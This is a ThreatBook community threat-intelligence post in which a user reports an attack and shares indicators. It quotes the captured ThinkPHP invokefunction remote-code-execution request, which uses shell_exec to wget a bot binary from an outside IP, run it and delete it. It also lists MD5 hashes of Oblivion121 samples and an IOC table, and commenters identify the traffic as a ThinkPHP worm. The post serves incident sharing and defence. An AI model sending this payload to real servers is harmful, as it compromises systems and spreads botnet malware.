threatBookweiwhy
IOC 14

threatBookthreatBook

我被攻击了入侵
被奇怪的东西攻击
weiwhy
2021-01-14 11:06:17ThreatBook2276
+ 关注
GET /index.php?s=/index/	hink.pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://5.188.0.27/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1

Connection: keep-alive

Accept-Encoding: gzip, deflate

Accept: /

User-Agent: Uirusu/2.0

image.png


bb63f52a8b7a2ba943b165a4ab83ac64  ./Oblivion121.arm

9bd515bea43184f017e833e44db0077e  ./Oblivion121.arm5

eccc893bcfe599ed5b0a7077735f2d30  ./Oblivion121.arm6

4159b2bcd76f7f553d9302e2cceddd4b  ./Oblivion121.arm7

498c11520b36e2c3be5873aec1bd57c1  ./Oblivion121.m68k

fe5f0d96a10823a6944864286b9cd7c3  ./Oblivion121.mips

57be571e261dfd611d35f70be49b2515  ./Oblivion121.mpsl

a40aaea4ca7aaa01ffb6e2f8a6cc8c1e  ./Oblivion121.ppc

923b6b27b54dec138a92d8e60b2f45b6  ./Oblivion121.sh4

43bada8c194d0f2bb814010ecd3a703c  ./Oblivion121.spc

80ab61b6f6106a0432fd3a734f098325  ./Oblivion121.x86

展开全部ThreatBook

威胁指标(IOC)

IP端口域名样本标签
5.188.0.270102
20.51.245.1140000
Hash检测结果样本标签
4159b2bcd76f7f553d9302e2cceddd4b8/2500
43bada8c194d0f2bb814010ecd3a703c0/000
498c11520b36e2c3be5873aec1bd57c18/2500
57be571e261dfd611d35f70be49b25158/2500
80ab61b6f6106a0432fd3a734f0983257/2500
查看全部12threatBook
4

评论

ThreatBook
qia0dan
2021-01-29 18:58:57
threatBook0
TP5 RCE 蠕虫吧
AL01
2021-01-20 16:28:09
threatBook0
maria
情报分析师
2021-01-14 11:29:59
threatBook0
正常,就是一个利用ThinkPHP漏洞传播的蠕虫病毒在互联网上面瞎窜。
已经到底了,没有更多内容了
Copyright © ThreatBook.CN All Rights Reserved.京ICP备15044984号-4 北京微步在线科技有限公司 京公网安备11010802025715号